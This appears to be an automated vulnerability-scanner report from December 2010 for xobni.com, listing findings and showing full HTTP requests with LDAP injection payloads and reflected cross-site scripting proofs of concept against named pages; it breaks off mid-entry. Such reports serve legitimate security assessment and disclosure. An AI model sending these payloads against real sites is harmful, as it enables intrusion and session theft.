xobni.com, Site Report

Vulnerability Crawler Report for xobni.com at 0128 GMT on 12/14/2010

Report generated by CloudScan Vulnerability Crawler at Mon Dec 13 19:27:49 CST 2010.


Cross Site Scripting on xobni.com




1. LDAP injection

2. Cross-site scripting (reflected)

2.1. http://www.xobni.com/account/ [rd parameter]

2.2. http://www.xobni.com/account/gadget_welcome [name of an arbitrarily supplied request parameter]

2.3. http://www.xobni.com/account/set_extension [name of an arbitrarily supplied request parameter]

2.4. http://www.xobni.com/fr-fr/account/gadget_welcome [name of an arbitrarily supplied request parameter]

2.5. http://www.xobni.com/download [trigger_id cookie]

2.6. http://www.xobni.com/download [trigger_id cookie]

2.7. http://www.xobni.com/download/ [trigger_id cookie]

2.8. http://www.xobni.com/download/12341 [trigger_id cookie]

2.9. http://www.xobni.com/download/latest [trigger_id cookie]

3. Silverlight cross-domain policy

4. Session token in URL

5. Flash cross-domain policy

6. Cookie scoped to parent domain

6.1. http://www.xobni.com/support/troubleshooter.php

6.2. http://www.xobni.com/

6.3. http://www.xobni.com/download

6.4. http://www.xobni.com/download/

6.5. http://www.xobni.com/download/12341

6.6. http://www.xobni.com/download/latest

6.7. http://www.xobni.com/lp/

7. Cookie without HttpOnly flag set

7.1. http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d

7.2. http://www.xobni.com/support/troubleshooter.php

7.3. http://www.xobni.com/

7.4. http://www.xobni.com/download

7.5. http://www.xobni.com/download/

7.6. http://www.xobni.com/download/12341

7.7. http://www.xobni.com/download/latest

7.8. http://www.xobni.com/lp/

8. Password field with autocomplete enabled

8.1. http://www.xobni.com/account/

8.2. http://www.xobni.com/account/

8.3. http://www.xobni.com/fr-fr/account/

8.4. http://www.xobni.com/fr-fr/account/

9. Referer-dependent response

9.1. http://www.xobni.com/enterprise/contact

9.2. http://www.xobni.com/fr-fr/account.

9.3. http://www.xobni.com/fr-fr/legal/privacy.

9.4. http://www.xobni.com/fr-fr/legal/tos.

9.5. http://www.xobni.com/homepage/productmenu/free

9.6. http://www.xobni.com/homepage/productmenu/mobilebb

9.7. http://www.xobni.com/homepage/productmenu/plus

9.8. http://www.xobni.com/homepage/productmenu/xobnione

9.9. http://www.xobni.com/learnmore/mobile/buynow

9.10. http://www.xobni.com/learnmore/mobile/trial

10. Cross-domain POST

10.1. http://www.xobni.com/enterprise/sign_up

10.2. http://www.xobni.com/partners/partners_signup.php

11. Cross-domain Referer leakage

11.1. http://www.xobni.com/

11.2. http://www.xobni.com/about/

11.3. http://www.xobni.com/account/

11.4. http://www.xobni.com/developer/

11.5. http://www.xobni.com/download

11.6. http://www.xobni.com/download

11.7. http://www.xobni.com/download

11.8. http://www.xobni.com/enterprise

11.9. http://www.xobni.com/errors/404.php

11.10. http://www.xobni.com/learnmore/video

11.11. http://www.xobni.com/mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d

11.12. http://www.xobni.com/partners

11.13. http://www.xobni.com/press/testimonials

11.14. http://www.xobni.com/products

11.15. http://www.xobni.com/support/

11.16. http://www.xobni.com/support/

11.17. http://www.xobni.com/support/

11.18. http://www.xobni.com/support/contact_form

12. Cross-domain script include

12.1. http://www.xobni.com/

12.2. http://www.xobni.com/about/

12.3. http://www.xobni.com/about/contact

12.4. http://www.xobni.com/about/jobs

12.5. http://www.xobni.com/about/jobs.php

12.6. http://www.xobni.com/about/opensource

12.7. http://www.xobni.com/about/opensource.php

12.8. http://www.xobni.com/account/

12.9. http://www.xobni.com/admin/

12.10. http://www.xobni.com/advanced-search

12.11. http://www.xobni.com/autosuggest-outlook

12.12. http://www.xobni.com/blackberry

12.13. http://www.xobni.com/csscache/

12.14. http://www.xobni.com/csscache/1256842155/

12.15. http://www.xobni.com/csscache/1256842155/styles/

12.16. http://www.xobni.com/csscache/1265760498/

12.17. http://www.xobni.com/csscache/1265760498/styles/

12.18. http://www.xobni.com/csscache/1291147037/

12.19. http://www.xobni.com/csscache/1291147037/styles/

12.20. http://www.xobni.com/developer/

12.21. http://www.xobni.com/developer/gadget_hoovers

12.22. http://www.xobni.com/download

12.23. http://www.xobni.com/download/

12.24. http://www.xobni.com/download/12341

12.25. http://www.xobni.com/download/latest

12.26. http://www.xobni.com/email-analytics

12.27. http://www.xobni.com/enterprise

12.28. http://www.xobni.com/enterprise/

12.29. http://www.xobni.com/enterprise/case_studies

12.30. http://www.xobni.com/enterprise/contact

12.31. http://www.xobni.com/enterprise/mobile_professionals

12.32. http://www.xobni.com/enterprise/sales_professionals

12.33. http://www.xobni.com/enterprise/salesforce_extension

12.34. http://www.xobni.com/enterprise/sharepoint_extension

12.35. http://www.xobni.com/enterprise/sign_up

12.36. http://www.xobni.com/enterprise/solutions_providers

12.37. http://www.xobni.com/errors/401.php

12.38. http://www.xobni.com/errors/403.php

12.39. http://www.xobni.com/errors/404.php

12.40. http://www.xobni.com/errors/500.php

12.41. http://www.xobni.com/errors/general.php

12.42. http://www.xobni.com/facebook-outlook

12.43. http://www.xobni.com/fan

12.44. http://www.xobni.com/find-attachments

12.45. http://www.xobni.com/fr-fr/

12.46. http://www.xobni.com/fr-fr/account.

12.47. http://www.xobni.com/fr-fr/account/

12.48. http://www.xobni.com/fr-fr/legal/privacy.

12.49. http://www.xobni.com/fr-fr/legal/tos.

12.50. http://www.xobni.com/get-salesforce

12.51. http://www.xobni.com/homepage/

12.52. http://www.xobni.com/homepage/homeproducts/

12.53. http://www.xobni.com/homepage/homeproducts/subsfree_test

12.54. http://www.xobni.com/homepage/homeproducts/subsplus_popup_test

12.55. http://www.xobni.com/homepage/homeproducts/subsplus_test

12.56. http://www.xobni.com/homepage/homeproducts/xobnifree

12.57. http://www.xobni.com/homepage/homeproducts/xobnimobile

12.58. http://www.xobni.com/homepage/homeproducts/xobniplus

12.59. http://www.xobni.com/homepage/productmenu/

12.60. http://www.xobni.com/homepage/productmenu/free

12.61. http://www.xobni.com/homepage/productmenu/mobilebb

12.62. http://www.xobni.com/homepage/productmenu/plus

12.63. http://www.xobni.com/homepage/productmenu/xobnione

12.64. http://www.xobni.com/hoovers-outlook

12.65. http://www.xobni.com/huddle-outlook

12.66. http://www.xobni.com/learnmore/

12.67. http://www.xobni.com/learnmore/compare.php

12.68. http://www.xobni.com/learnmore/extension_step1.php

12.69. http://www.xobni.com/learnmore/mobile

12.70. http://www.xobni.com/learnmore/mobile/

12.71. http://www.xobni.com/learnmore/mobile/blackberry/

12.72. http://www.xobni.com/learnmore/mobile/blackberry/get_started

12.73. http://www.xobni.com/learnmore/mobile/blackberry/get_started.php

12.74. http://www.xobni.com/learnmore/mobile/blackberry/magic_address_book

12.75. http://www.xobni.com/learnmore/mobile/blackberry/setup_instructions

12.76. http://www.xobni.com/learnmore/mobile/blackberry/setup_instructions.php

12.77. http://www.xobni.com/learnmore/mobile/buynow

12.78. http://www.xobni.com/learnmore/mobile/trial

12.79. http://www.xobni.com/learnmore/one/

12.80. http://www.xobni.com/learnmore/plus/

12.81. http://www.xobni.com/learnmore/plus/advanced_search.php

12.82. http://www.xobni.com/learnmore/video

12.83. http://www.xobni.com/legal/ip_policy

12.84. http://www.xobni.com/legal/license

12.85. http://www.xobni.com/legal/privacy

12.86. http://www.xobni.com/legal/tos

12.87. http://www.xobni.com/legal/trademarks

12.88. http://www.xobni.com/linkedin-outlook

12.89. http://www.xobni.com/lp/

12.90. http://www.xobni.com/lp/x1/

12.91. http://www.xobni.com/media/contextual_gadgets/hoovers/xobniHoovers.xml

12.92. http://www.xobni.com/mobile

12.93. http://www.xobni.com/mobile/

12.94. http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/

12.95. http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d

12.96. http://www.xobni.com/mobile81ff6scriptalert(document.cookie)/

12.97. http://www.xobni.com/mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d

12.98. http://www.xobni.com/one

12.99. http://www.xobni.com/opensource/NsisDotNet/README.htm

12.100. http://www.xobni.com/outlook-calendar

12.101. http://www.xobni.com/outlook-social-connector

12.102. http://www.xobni.com/partners

12.103. http://www.xobni.com/partners/

12.104. http://www.xobni.com/partners/partners_content

12.105. http://www.xobni.com/partners/partners_content.php

12.106. http://www.xobni.com/partners/partners_signup.php

12.107. http://www.xobni.com/plus

12.108. http://www.xobni.com/press/

12.109. http://www.xobni.com/press/05202010_german_release.php

12.110. http://www.xobni.com/press/09022010_harris_survey

12.111. http://www.xobni.com/press/10282010_french_release.php

12.112. http://www.xobni.com/press/coverage

12.113. http://www.xobni.com/press/logos

12.114. http://www.xobni.com/press/releases

12.115. http://www.xobni.com/press/testimonials

12.116. http://www.xobni.com/products

12.117. http://www.xobni.com/relationship-management

12.118. http://www.xobni.com/salesforce

12.119. http://www.xobni.com/salesforce-outlook

12.120. http://www.xobni.com/search-conversations

12.121. http://www.xobni.com/search-outlook

12.122. http://www.xobni.com/social-outlook

12.123. http://www.xobni.com/support/

12.124. http://www.xobni.com/support/contact_form

12.125. http://www.xobni.com/support/index.php

12.126. http://www.xobni.com/threaded-conversations

12.127. http://www.xobni.com/twitter-outlook

12.128. http://www.xobni.com/xing-outlook

12.129. http://www.xobni.com/xlbh084ghjklyvco872656468

12.130. http://www.xobni.com/xlbh084ghjklyvco872656468/

12.131. http://www.xobni.com/xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l

12.132. http://www.xobni.com/xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l/

12.133. http://www.xobni.com/xobni-plus

12.134. https://www.xobni.com/support/

12.135. https://www.xobni.com/videos/

13. Directory listing

13.1. http://www.xobni.com/enterprise/case_studies/

13.2. http://www.xobni.com/enterprise/datasheets/

13.3. http://www.xobni.com/errors/

13.4. http://www.xobni.com/icons/

13.5. http://www.xobni.com/images/

13.6. http://www.xobni.com/images/badge/

13.7. http://www.xobni.com/images/banners/

13.8. http://www.xobni.com/images/buttons/

13.9. http://www.xobni.com/images/client/

13.10. http://www.xobni.com/images/company/

13.11. http://www.xobni.com/images/company/adayat/

13.12. http://www.xobni.com/images/company/carousel/

13.13. http://www.xobni.com/images/company/team/

13.14. http://www.xobni.com/images/features/

13.15. http://www.xobni.com/images/gadgets/

13.16. http://www.xobni.com/images/headers/

13.17. http://www.xobni.com/images/highlights/

13.18. http://www.xobni.com/images/howto/

13.19. http://www.xobni.com/images/icons/

13.20. http://www.xobni.com/images/installer/

13.21. http://www.xobni.com/images/jobs/

13.22. http://www.xobni.com/images/linkedin_proxy/

13.23. http://www.xobni.com/images/mascot/

13.24. http://www.xobni.com/images/partners/

13.25. http://www.xobni.com/images/parts/

13.26. http://www.xobni.com/images/press/

13.27. http://www.xobni.com/images/promo/

13.28. http://www.xobni.com/images/screenshots/

13.29. http://www.xobni.com/images/store/

13.30. http://www.xobni.com/images/structure/

13.31. http://www.xobni.com/images/structure/ambient1/

13.32. http://www.xobni.com/images/structure/amblue/

13.33. http://www.xobni.com/images/structure/download/

13.34. http://www.xobni.com/images/structure/global/

13.35. http://www.xobni.com/images/structure/global/v1_8s/

13.36. http://www.xobni.com/images/structure/homepageapr10/

13.37. http://www.xobni.com/images/structure/homepageaug10/

13.38. http://www.xobni.com/images/structure/homepagejul10/

13.39. http://www.xobni.com/images/structure/homepagemar10/

13.40. http://www.xobni.com/images/structure/homepagenov09/

13.41. http://www.xobni.com/images/structure/linkedin/

13.42. http://www.xobni.com/images/structure/partners_amblue/

13.43. http://www.xobni.com/images/structure/partners_gray/

13.44. http://www.xobni.com/images/structure/press/

13.45. http://www.xobni.com/images/structure/skype/

13.46. http://www.xobni.com/images/structure/videoinline/

13.47. http://www.xobni.com/images/team/

13.48. http://www.xobni.com/images/welcome_screen/

13.49. http://www.xobni.com/javascripts/

13.50. http://www.xobni.com/javascripts/swfobject/

13.51. http://www.xobni.com/javascripts/swfobject/2.2/

13.52. http://www.xobni.com/media/

13.53. http://www.xobni.com/media/contextual_gadgets/

13.54. http://www.xobni.com/media/contextual_gadgets/hoovers/

13.55. http://www.xobni.com/media/contextual_gadgets/hoovers/images/

13.56. http://www.xobni.com/media/enterprise/

13.57. http://www.xobni.com/media/gadgets/

13.58. http://www.xobni.com/media/invites/

13.59. http://www.xobni.com/media/labs/

13.60. http://www.xobni.com/media/mobile/

13.61. http://www.xobni.com/media/plus/

13.62. http://www.xobni.com/media/press/

13.63. http://www.xobni.com/media/tutorials/

13.64. http://www.xobni.com/media/walkthroughs/

13.65. http://www.xobni.com/media/welcome_screen/

13.66. http://www.xobni.com/media/widgets/

13.67. http://www.xobni.com/media/widgetsv2/

13.68. http://www.xobni.com/media/widgetsv3/

13.69. http://www.xobni.com/opensource/

13.70. http://www.xobni.com/opensource/MonoGZipStream/

13.71. http://www.xobni.com/opensource/NsisDotNet/

14. Email addresses disclosed

14.1. http://www.xobni.com/about/contact

14.2. http://www.xobni.com/autosuggest-outlook

14.3. http://www.xobni.com/blackberry

14.4. http://www.xobni.com/enterprise

14.5. http://www.xobni.com/enterprise/

14.6. http://www.xobni.com/enterprise/case_studies

14.7. http://www.xobni.com/enterprise/mobile_professionals

14.8. http://www.xobni.com/enterprise/sales_professionals

14.9. http://www.xobni.com/enterprise/salesforce_extension

14.10. http://www.xobni.com/enterprise/sharepoint_extension

14.11. http://www.xobni.com/enterprise/sign_up

14.12. http://www.xobni.com/enterprise/solutions_providers

14.13. http://www.xobni.com/errors/403.php

14.14. http://www.xobni.com/errors/general.php

14.15. http://www.xobni.com/icons/

14.16. http://www.xobni.com/javascripts/jquery.base64.min.js

14.17. http://www.xobni.com/learnmore/mobile

14.18. http://www.xobni.com/learnmore/mobile/

14.19. http://www.xobni.com/learnmore/mobile/blackberry/

14.20. http://www.xobni.com/legal/ip_policy

14.21. http://www.xobni.com/legal/privacy

14.22. http://www.xobni.com/legal/trademarks

14.23. http://www.xobni.com/mobile

14.24. http://www.xobni.com/mobile/

14.25. http://www.xobni.com/opensource/NsisDotNet/README.htm

14.26. http://www.xobni.com/press/05202010_german_release.php

14.27. http://www.xobni.com/press/09022010_harris_survey

14.28. http://www.xobni.com/press/10282010_french_release.php

14.29. http://www.xobni.com/support/

14.30. http://www.xobni.com/support/index.php

14.31. https://www.xobni.com/support/

15. Credit card numbers disclosed

16. Robots.txt file

17. HTML does not specify charset

17.1. http://www.xobni.com/media/plus/xobni_plus_07.php

17.2. http://www.xobni.com/media/walkthroughs/xobni_features_02/

17.3. http://www.xobni.com/media/widgets.html

17.4. http://www.xobni.com/support/howto

17.5. http://www.xobni.com/support/upload/

18. SSL certificate



1. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.xobni.com
Path:   /errors/404.php

Issue detail

The source parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the source parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /errors/404.php?report_my_error=1&source=*)(sn=*&asked=test HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:11:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7799

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/enterprise" id="header_enterprise" class="enablepulldown">Unternehmen</a></li><li class=""><a href="/learnmore/video" id="header_videos" class="">Videos</a></li><li class=""><a href="/press/testimonials" id="header_testimonials" class="">Testimonials</a></li><li class=""><a href="/developer" id="header_developers" class="">Entwicklern</a></li></ul>
                   <div id="auxheader">
                       <div id="auxheaderinner">

                           <a href='/account/'>Anmelden</a>
                           <a id="header_partners" href="/partners">Partner</a>
                           <a href="/about">Das Unternehmen</a>
                           <a href="/support">Support</a>
                           <a href="/blog">Blog</a>
                       </div>
                   </div>
               <div class="pulldownmenu preload"><!----></div>
               </div>
            </div>
           
               
   
   
   
   
<div id="main">        
   <div id="steelcontent" class="nosidebar">
   
       <div id="leafboard">
           <h1>Ooops! Page Not Found </h1>
           <h2><b>Thanks for letting us know!</b><br/>Sorry about that. Care to head to our <a href="http://www.xobni.com">home page</a>?</h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></l
...[SNIP]...

Request 2

GET /errors/404.php?report_my_error=1&source=*)!(sn=*&asked=test HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:11:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7766

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/enterprise" id="header_enterprise" class="enablepulldown">Enterprise</a></li><li class=""><a href="/learnmore/video" id="header_videos" class="">Videos</a></li><li class=""><a href="/press/testimonials" id="header_testimonials" class="">Testimonials</a></li><li class=""><a href="/developer" id="header_developers" class="">Developers</a></li></ul>
                   <div id="auxheader">
                       <div id="auxheaderinner">

                           <a href='/account/'>Log In</a>
                           <a id="header_partners" href="/partners">Partners</a>
                           <a href="/about">Company Info</a>
                           <a href="/support">Support</a>
                           <a href="/blog">Blog</a>
                       </div>
                   </div>
               <div class="pulldownmenu preload"><!----></div>
               </div>
            </div>
           
               
   
   
   
   
<div id="main">        
   <div id="steelcontent" class="nosidebar">
   
       <div id="leafboard">
           <h1>Ooops! Page Not Found </h1>
           <h2><b>Thanks for letting us know!</b><br/>Sorry about that. Care to head to our <a href="http://www.xobni.com">home page</a>?</h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Company Info</h3>
       <ul>
           <li><a href="/about">About</a></li>
           <li><a href="/press">News Room</a></li>
           <li><a href="/about/jobs">Jobs</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner with Xobni</h3>
       <ul>
           <li><a href="/partners">Overview</a></li>
           <li><a href="/partners/partners_content">Content Partners</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Legal</h3>
       <ul>
           <li><a href="/legal/trademarks">Trademarks</a></li>
           <li><a href="/legal/privacy">Privacy Policy</a></li>
           <li><a hr
...[SNIP]...

2. Cross-site scripting (reflected)
There are 9 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.xobni.com/account/ [rd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /account/

Issue detail

The value of the rd request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c9c"><script>alert(1)</script>742637472ef was submitted in the rd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /account/?rd=%2Fsupport%2F%3Fcontact%3Dy13c9c"><script>alert(1)</script>742637472ef HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<input type="hidden" name="rd" value="/support/?contact=y13c9c"><script>alert(1)</script>742637472ef">
...[SNIP]...

2.2. http://www.xobni.com/account/gadget_welcome [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /account/gadget_welcome

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fac7"><script>alert(1)</script>f80ea45cd5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/gadget_welcome?9fac7"><script>alert(1)</script>f80ea45cd5e=1 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10913

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<input type="hidden" name="rd" value="/account/gadget_welcome?9fac7"><script>alert(1)</script>f80ea45cd5e=1">
...[SNIP]...

2.3. http://www.xobni.com/account/set_extension [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /account/set_extension

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1934"><script>alert(1)</script>7877214264b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/set_extension?f1934"><script>alert(1)</script>7877214264b=1 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10908

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<input type="hidden" name="rd" value="/account/set_extension?f1934"><script>alert(1)</script>7877214264b=1">
...[SNIP]...

2.4. http://www.xobni.com/fr-fr/account/gadget_welcome [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /fr-fr/account/gadget_welcome

Issue detail

